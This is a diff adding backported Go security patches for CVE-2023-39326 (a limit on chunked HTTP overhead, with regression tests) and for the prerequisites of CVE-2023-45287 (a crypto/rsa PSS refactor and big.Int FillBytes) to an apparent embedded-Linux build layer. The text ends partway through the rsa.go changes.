diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
new file mode 100644
index 0000000000..998af361e8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
+From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 7 Nov 2023 10:47:56 -0800
+Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
+
+The chunked transfer encoding adds some overhead to
+the content transferred. When writing one byte per
+chunk, for example, there are five bytes of overhead
+per byte of data transferred: "1\r\nX\r\n" to send "X".
+
+Chunks may include "chunk extensions",
+which we skip over and do not use.
+For example: "1;chunk extension here\r\nX\r\n".
+
+A malicious sender can use chunk extensions to add
+about 4k of overhead per byte of data.
+(The maximum chunk header line size we will accept.)
+
+Track the amount of overhead read in chunked data,
+and produce an error if it seems excessive.
+
+Updates #64433
+Fixes #64434
+Fixes CVE-2023-39326
+
+Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
+CVE: CVE-2023-39326
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/internal/chunked.go      | 36 +++++++++++++---
+ src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
+ 2 files changed, 89 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
+index f06e572..ddbaacb 100644
+--- a/src/net/http/internal/chunked.go
++++ b/src/net/http/internal/chunked.go
+@@ -39,7 +39,8 @@ type chunkedReader struct {
+ 	n        uint64 // unread bytes in chunk
+ 	err      error
+ 	buf      [2]byte
+-	checkEnd bool // whether need to check for \r\n chunk footer
++	checkEnd bool  // whether need to check for \r\n chunk footer
++	excess   int64 // "excessive" chunk overhead, for malicious sender detection
+ }
+ 
+ func (cr *chunkedReader) beginChunk() {
+@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
+ 	if cr.err != nil {
+ 		return
+ 	}
++	cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
++	line = trimTrailingWhitespace(line)
++	line, cr.err = removeChunkExtension(line)
++	if cr.err != nil {
++		return
++	}
+ 	cr.n, cr.err = parseHexUint(line)
+ 	if cr.err != nil {
+ 		return
+ 	}
++	// A sender who sends one byte per chunk will send 5 bytes of overhead
++	// for every byte of data. ("1\r\nX\r\n" to send "X".)
++	// We want to allow this, since streaming a byte at a time can be legitimate.
++	//
++	// A sender can use chunk extensions to add arbitrary amounts of additional
++	// data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
++	// We don't want to disallow extensions (although we discard them),
++	// but we also don't want to allow a sender to reduce the signal/noise ratio
++	// arbitrarily.
++	//
++	// We track the amount of excess overhead read,
++	// and produce an error if it grows too large.
++	//
++	// Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
++	// plus twice the amount of real data in the chunk.
++	cr.excess -= 16 + (2 * int64(cr.n))
++	if cr.excess < 0 {
++		cr.excess = 0
++	}
++	if cr.excess > 16*1024 {
++		cr.err = errors.New("chunked encoding contains too much non-data")
++	}
+ 	if cr.n == 0 {
+ 		cr.err = io.EOF
+ 	}
+@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
+ 	if len(p) >= maxLineLength {
+ 		return nil, ErrLineTooLong
+ 	}
+-	p = trimTrailingWhitespace(p)
+-	p, err = removeChunkExtension(p)
+-	if err != nil {
+-		return nil, err
+-	}
+ 	return p, nil
+ }
+ 
+diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
+index d067165..b20747d 100644
+--- a/src/net/http/internal/chunked_test.go
++++ b/src/net/http/internal/chunked_test.go
+@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
+ 	}
+ 
+ }
++
++func TestChunkReaderTooMuchOverhead(t *testing.T) {
++	// If the sender is sending 100x as many chunk header bytes as chunk data,
++	// we should reject the stream at some point.
++	chunk := []byte("1;")
++	for i := 0; i < 100; i++ {
++		chunk = append(chunk, 'a') // chunk extension
++	}
++	chunk = append(chunk, "\r\nX\r\n"...)
++	const bodylen = 1 << 20
++	r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++		if i < bodylen {
++			return chunk, nil
++		}
++		return []byte("0\r\n"), nil
++	}})
++	_, err := io.ReadAll(r)
++	if err == nil {
++		t.Fatalf("successfully read body with excessive overhead; want error")
++	}
++}
++
++func TestChunkReaderByteAtATime(t *testing.T) {
++	// Sending one byte per chunk should not trip the excess-overhead detection.
++	const bodylen = 1 << 20
++	r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++		if i < bodylen {
++			return []byte("1\r\nX\r\n"), nil
++		}
++		return []byte("0\r\n"), nil
++	}})
++	got, err := io.ReadAll(r)
++	if err != nil {
++		t.Errorf("unexpected error: %v", err)
++	}
++	if len(got) != bodylen {
++		t.Errorf("read %v bytes, want %v", len(got), bodylen)
++	}
++}
++
++type funcReader struct {
++	f   func(iteration int) ([]byte, error)
++	i   int
++	b   []byte
++	err error
++}
++
++func (r *funcReader) Read(p []byte) (n int, err error) {
++	if len(r.b) == 0 && r.err == nil {
++		r.b, r.err = r.f(r.i)
++		r.i++
++	}
++	n = copy(p, r.b)
++	r.b = r.b[n:]
++	if len(r.b) > 0 {
++		return n, nil
++	}
++	return n, r.err
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
new file mode 100644
index 0000000000..4d65180253
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
+From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Wed, 1 Apr 2020 17:25:40 -0400
+Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
+
+Cleaned up for readability and consistency.
+
+There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
+used and both hash and opts.Hash were set, hash.Size() was used for the
+salt length instead of opts.Hash.Size(). That's clearly wrong because
+opts.Hash is documented to override hash.
+
+Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
+CVE: CVE-2023-45287 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
+ src/crypto/rsa/rsa.go |   9 ++-
+ 2 files changed, 96 insertions(+), 86 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 3ff0c2f4d0076..f9844d87329a8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -4,9 +4,7 @@
+ 
+ package rsa
+ 
+-// This file implements the PSS signature scheme [1].
+-//
+-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
++// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
+ 
+ import (
+ 	"bytes"
+@@ -17,8 +15,22 @@ import (
+ 	"math/big"
+ )
+ 
++// Per RFC 8017, Section 9.1
++//
++//     EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
++//
++// where
++//
++//     DB = PS || 0x01 || salt
++//
++// and PS can be empty so
++//
++//     emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
++//
++
+ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
+-	// See [1], section 9.1.1
++	// See RFC 8017, Section 9.1.1.
++
+ 	hLen := hash.Size()
+ 	sLen := len(salt)
+ 	emLen := (emBits + 7) / 8
+@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ 	// 2.  Let mHash = Hash(M), an octet string of length hLen.
+ 
+ 	if len(mHash) != hLen {
+-		return nil, errors.New("crypto/rsa: input must be hashed message")
++		return nil, errors.New("crypto/rsa: input must be hashed with given hash")
+ 	}
+ 
+ 	// 3.  If emLen < hLen + sLen + 2, output "encoding error" and stop.
+@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ 	}
+ 
+ 	em := make([]byte, emLen)
+-	db := em[:emLen-sLen-hLen-2+1+sLen]
+-	h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
++	psLen := emLen - sLen - hLen - 2
++	db := em[:psLen+1+sLen]
++	h := em[psLen+1+sLen : emLen-1]
+ 
+ 	// 4.  Generate a random octet string salt of length sLen; if sLen = 0,
+ 	//     then salt is the empty string.
+@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ 	// 8.  Let DB = PS || 0x01 || salt; DB is an octet string of length
+ 	//     emLen - hLen - 1.
+ 
+-	db[emLen-sLen-hLen-2] = 0x01
+-	copy(db[emLen-sLen-hLen-1:], salt)
++	db[psLen] = 0x01
++	copy(db[psLen+1:], salt)
+ 
+ 	// 9.  Let dbMask = MGF(H, emLen - hLen - 1).
+ 	//
+@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ 	// 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ 	//     maskedDB to zero.
+ 
+-	db[0] &= (0xFF >> uint(8*emLen-emBits))
++	db[0] &= 0xff >> (8*emLen - emBits)
+ 
+ 	// 12. Let EM = maskedDB || H || 0xbc.
+-	em[emLen-1] = 0xBC
++	em[emLen-1] = 0xbc
+ 
+ 	// 13. Output EM.
+ 	return em, nil
+ }
+ 
+ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
++	// See RFC 8017, Section 9.1.2.
++
++	hLen := hash.Size()
++	if sLen == PSSSaltLengthEqualsHash {
++		sLen = hLen
++	}
++	emLen := (emBits + 7) / 8
++	if emLen != len(em) {
++		return errors.New("rsa: internal error: inconsistent length")
++	}
++
+ 	// 1.  If the length of M is greater than the input limitation for the
+ 	//     hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
+ 	//     and stop.
+ 	//
+ 	// 2.  Let mHash = Hash(M), an octet string of length hLen.
+-	hLen := hash.Size()
+ 	if hLen != len(mHash) {
+ 		return ErrVerification
+ 	}
+ 
+ 	// 3.  If emLen < hLen + sLen + 2, output "inconsistent" and stop.
+-	emLen := (emBits + 7) / 8
+ 	if emLen < hLen+sLen+2 {
+ 		return ErrVerification
+ 	}
+ 
+ 	// 4.  If the rightmost octet of EM does not have hexadecimal value
+ 	//     0xbc, output "inconsistent" and stop.
+-	if em[len(em)-1] != 0xBC {
++	if em[emLen-1] != 0xbc {
+ 		return ErrVerification
+ 	}
+ 
+ 	// 5.  Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
+ 	//     let H be the next hLen octets.
+ 	db := em[:emLen-hLen-1]
+-	h := em[emLen-hLen-1 : len(em)-1]
++	h := em[emLen-hLen-1 : emLen-1]
+ 
+ 	// 6.  If the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ 	//     maskedDB are not all equal to zero, output "inconsistent" and
+ 	//     stop.
+-	if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
++	var bitMask byte = 0xff >> (8*emLen - emBits)
++	if em[0] & ^bitMask != 0 {
+ 		return ErrVerification
+ 	}
+ 
+@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ 
+ 	// 9.  Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
+ 	//     to zero.
+-	db[0] &= (0xFF >> uint(8*emLen-emBits))
++	db[0] &= bitMask
+ 
++	// If we don't know the salt length, look for the 0x01 delimiter.
+ 	if sLen == PSSSaltLengthAuto {
+-	FindSaltLength:
+-		for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
+-			switch db[emLen-hLen-sLen-2] {
+-			case 1:
+-				break FindSaltLength
+-			case 0:
+-				continue
+-			default:
+-				return ErrVerification
+-			}
+-		}
+-		if sLen < 0 {
++		psLen := bytes.IndexByte(db, 0x01)
++		if psLen < 0 {
+ 			return ErrVerification
+ 		}
+-	} else {
+-		// 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
+-		//     or if the octet at position emLen - hLen - sLen - 1 (the leftmost
+-		//     position is "position 1") does not have hexadecimal value 0x01,
+-		//     output "inconsistent" and stop.
+-		for _, e := range db[:emLen-hLen-sLen-2] {
+-			if e != 0x00 {
+-				return ErrVerification
+-			}
+-		}
+-		if db[emLen-hLen-sLen-2] != 0x01 {
++		sLen = len(db) - psLen - 1
++	}
++
++	// 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
++	//     or if the octet at position emLen - hLen - sLen - 1 (the leftmost
++	//     position is "position 1") does not have hexadecimal value 0x01,
++	//     output "inconsistent" and stop.
++	psLen := emLen - hLen - sLen - 2
++	for _, e := range db[:psLen] {
++		if e != 0x00 {
+ 			return ErrVerification
+ 		}
+ 	}
++	if db[psLen] != 0x01 {
++		return ErrVerification
++	}
+ 
+ 	// 11.  Let salt be the last sLen octets of DB.
+ 	salt := db[len(db)-sLen:]
+@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ 	h0 := hash.Sum(nil)
+ 
+ 	// 14. If H = H', output "consistent." Otherwise, output "inconsistent."
+-	if !bytes.Equal(h0, h) {
++	if !bytes.Equal(h0, h) { // TODO: constant time?
+ 		return ErrVerification
+ 	}
+ 	return nil
+ }
+ 
+-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
++// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
+-	nBits := priv.N.BitLen()
+-	em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
++	emBits := priv.N.BitLen() - 1
++	em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ 	if err != nil {
+ 		return
+ 	}
+@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
+ 	if err != nil {
+ 		return
+ 	}
+-	s = make([]byte, (nBits+7)/8)
++	s = make([]byte, priv.Size())
+ 	copyWithLeftPad(s, c.Bytes())
+ 	return
+ }
+@@ -223,16 +239,15 @@ type PSSOptions struct {
+ 	// PSSSaltLength constants.
+ 	SaltLength int
+ 
+-	// Hash, if not zero, overrides the hash function passed to SignPSS.
+-	// This is the only way to specify the hash function when using the
+-	// crypto.Signer interface.
++	// Hash is the hash function used to generate the message digest. If not
++	// zero, it overrides the hash function passed to SignPSS. It's required
++	// when using PrivateKey.Sign.
+ 	Hash crypto.Hash
+ }
+ 
+-// HashFunc returns pssOpts.Hash so that PSSOptions implements
+-// crypto.SignerOpts.
+-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
+-	return pssOpts.Hash
++// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
++func (opts *PSSOptions) HashFunc() crypto.Hash {
++	return opts.Hash
+ }
+ 
+ func (opts *PSSOptions) saltLength() int {
+@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
+ 	return opts.SaltLength
+ }
+ 
+-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
+-// Note that hashed must be the result of hashing the input message using the
+-// given hash function. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
++// SignPSS calculates the signature of digest using PSS.
++//
++// digest must be the result of hashing the input message using the given hash
++// function. The opts argument may be nil, in which case sensible defaults are
++// used. If opts.Hash is set, it overrides hash.
++func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
++	if opts != nil && opts.Hash != 0 {
++		hash = opts.Hash
++	}
++
+ 	saltLength := opts.saltLength()
+ 	switch saltLength {
+ 	case PSSSaltLengthAuto:
+-		saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
++		saltLength = priv.Size() - 2 - hash.Size()
+ 	case PSSSaltLengthEqualsHash:
+ 		saltLength = hash.Size()
+ 	}
+ 
+-	if opts != nil && opts.Hash != 0 {
+-		hash = opts.Hash
+-	}
+-
+ 	salt := make([]byte, saltLength)
+ 	if _, err := io.ReadFull(rand, salt); err != nil {
+ 		return nil, err
+ 	}
+-	return signPSSWithSalt(rand, priv, hash, hashed, salt)
++	return signPSSWithSalt(rand, priv, hash, digest, salt)
+ }
+ 
+ // VerifyPSS verifies a PSS signature.
+-// hashed is the result of hashing the input message using the given hash
+-// function and sig is the signature. A valid signature is indicated by
+-// returning a nil error. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
+-	return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
+-}
+-
+-// verifyPSS verifies a PSS signature with the given salt length.
+-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
+-	nBits := pub.N.BitLen()
+-	if len(sig) != (nBits+7)/8 {
++//
++// A valid signature is indicated by returning a nil error. digest must be the
++// result of hashing the input message using the given hash function. The opts
++// argument may be nil, in which case sensible defaults are used. opts.Hash is
++// ignored.
++func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
++	if len(sig) != pub.Size() {
+ 		return ErrVerification
+ 	}
+ 	s := new(big.Int).SetBytes(sig)
+ 	m := encrypt(new(big.Int), pub, s)
+-	emBits := nBits - 1
++	emBits := pub.N.BitLen() - 1
+ 	emLen := (emBits + 7) / 8
+-	if emLen < len(m.Bytes()) {
++	emBytes := m.Bytes()
++	if emLen < len(emBytes) {
+ 		return ErrVerification
+ 	}
+ 	em := make([]byte, emLen)
+-	copyWithLeftPad(em, m.Bytes())
+-	if saltLen == PSSSaltLengthEqualsHash {
+-		saltLen = hash.Size()
+-	}
+-	return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
++	copyWithLeftPad(em, emBytes)
++	return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a42990640164..b4bfa13defbdf 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -2,7 +2,7 @@
+ // Use of this source code is governed by a BSD-style
+ // license that can be found in the LICENSE file.
+ 
+-// Package rsa implements RSA encryption as specified in PKCS#1.
++// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
+ //
+ // RSA is a single, fundamental operation that is used in this package to
+ // implement either public-key encryption or public-key signatures.
+@@ -10,13 +10,13 @@
+ // The original specification for encryption and signatures with RSA is PKCS#1
+ // and the terms "RSA encryption" and "RSA signatures" by default refer to
+ // PKCS#1 version 1.5. However, that specification has flaws and new designs
+-// should use version two, usually called by just OAEP and PSS, where
++// should use version 2, usually called by just OAEP and PSS, where
+ // possible.
+ //
+ // Two sets of interfaces are included in this package. When a more abstract
+ // interface isn't necessary, there are functions for encrypting/decrypting
+ // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
+-// over the public-key primitive, the PrivateKey struct implements the
++// over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+ // The RSA operations in this package are not implemented using constant-time algorithms.
+@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
+ 
+ // Sign signs digest with priv, reading randomness from rand. If opts is a
+ // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
+-// be used.
++// be used. digest must be the result of hashing the input message using
++// opts.HashFunc().
+ //
+ // This method implements crypto.Signer, which is an interface to support keys
+ // where the private part is kept in, for example, a hardware module. Common
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
+From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Mon, 27 Apr 2020 21:52:38 -0400
+Subject: [PATCH] math/big: add (*Int).FillBytes
+
+Replaced almost every use of Bytes with FillBytes.
+
+Note that the approved proposal was for
+
+    func (*Int) FillBytes(buf []byte)
+
+while this implements
+
+    func (*Int) FillBytes(buf []byte) []byte
+
+because the latter was far nicer to use in all callsites.
+
+Fixes #35833
+
+Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
+Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
+Reviewed-by: Robert Griesemer <gri@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
+CVE: CVE-2023-45287 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/elliptic/elliptic.go | 13 ++++----
+ src/crypto/rsa/pkcs1v15.go      | 20 +++---------
+ src/crypto/rsa/pss.go           | 17 +++++------
+ src/crypto/rsa/rsa.go           | 32 +++----------------
+ src/crypto/tls/key_schedule.go  |  7 ++---
+ src/crypto/x509/sec1.go         |  7 ++---
+ src/math/big/int.go             | 15 +++++++++
+ src/math/big/int_test.go        | 54 +++++++++++++++++++++++++++++++++
+ src/math/big/nat.go             | 15 ++++++---
+ 9 files changed, 106 insertions(+), 74 deletions(-)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cdb63bab..bd5168c5fd842 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
+ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
+ 	N := curve.Params().N
+ 	bitSize := N.BitLen()
+-	byteLen := (bitSize + 7) >> 3
++	byteLen := (bitSize + 7) / 8
+ 	priv = make([]byte, byteLen)
+ 
+ 	for x == nil {
+@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
+ 
+ // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
+ func Marshal(curve Curve, x, y *big.Int) []byte {
+-	byteLen := (curve.Params().BitSize + 7) >> 3
++	byteLen := (curve.Params().BitSize + 7) / 8
+ 
+ 	ret := make([]byte, 1+2*byteLen)
+ 	ret[0] = 4 // uncompressed point
+ 
+-	xBytes := x.Bytes()
+-	copy(ret[1+byteLen-len(xBytes):], xBytes)
+-	yBytes := y.Bytes()
+-	copy(ret[1+2*byteLen-len(yBytes):], yBytes)
++	x.FillBytes(ret[1 : 1+byteLen])
++	y.FillBytes(ret[1+byteLen : 1+2*byteLen])
++
+ 	return ret
+ }
+ 
+@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
+ // It is an error if the point is not in uncompressed form or is not on the curve.
+ // On error, x = nil.
+ func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
+-	byteLen := (curve.Params().BitSize + 7) >> 3
++	byteLen := (curve.Params().BitSize + 7) / 8
+ 	if len(data) != 1+2*byteLen {
+ 		return
+ 	}
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index 499242ffc5b57..3208119ae1ff4 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ 	m := new(big.Int).SetBytes(em)
+ 	c := encrypt(new(big.Int), pub, m)
+ 
+-	copyWithLeftPad(em, c.Bytes())
+-	return em, nil
++	return c.FillBytes(em), nil
+ }
+ 
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
+ 		return
+ 	}
+ 
+-	em = leftPad(m.Bytes(), k)
++	em = m.FillBytes(make([]byte, k))
+ 	firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ 	secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+ 
+@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ 		return nil, err
+ 	}
+ 
+-	copyWithLeftPad(em, c.Bytes())
+-	return em, nil
++	return c.FillBytes(em), nil
+ }
+ 
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+ 
+ 	c := new(big.Int).SetBytes(sig)
+ 	m := encrypt(new(big.Int), pub, c)
+-	em := leftPad(m.Bytes(), k)
++	em := m.FillBytes(make([]byte, k))
+ 	// EM = 0x00 || 0x01 || PS || 0x00 || T
+ 
+ 	ok := subtle.ConstantTimeByteEq(em[0], 0)
+@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
+ 	}
+ 	return
+ }
+-
+-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
+-// needed.
+-func copyWithLeftPad(dest, src []byte) {
+-	numPaddingBytes := len(dest) - len(src)
+-	for i := 0; i < numPaddingBytes; i++ {
+-		dest[i] = 0
+-	}
+-	copy(dest[numPaddingBytes:], src)
+-}
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index f9844d87329a8..b2adbedb28fa8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
++func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+ 	emBits := priv.N.BitLen() - 1
+ 	em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ 	if err != nil {
+-		return
++		return nil, err
+ 	}
+ 	m := new(big.Int).SetBytes(em)
+ 	c, err := decryptAndCheck(rand, priv, m)
+ 	if err != nil {
+-		return
++		return nil, err
+ 	}
+-	s = make([]byte, priv.Size())
+-	copyWithLeftPad(s, c.Bytes())
+-	return
++	s := make([]byte, priv.Size())
++	return c.FillBytes(s), nil
+ }
+ 
+ const (
+@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ 	m := encrypt(new(big.Int), pub, s)
+ 	emBits := pub.N.BitLen() - 1
+ 	emLen := (emBits + 7) / 8
+-	emBytes := m.Bytes()
+-	if emLen < len(emBytes) {
++	if m.BitLen() > emLen*8 {
+ 		return ErrVerification
+ 	}
+-	em := make([]byte, emLen)
+-	copyWithLeftPad(em, emBytes)
++	em := m.FillBytes(make([]byte, emLen))
+ 	return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index b4bfa13defbdf..28eb5926c1a54 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
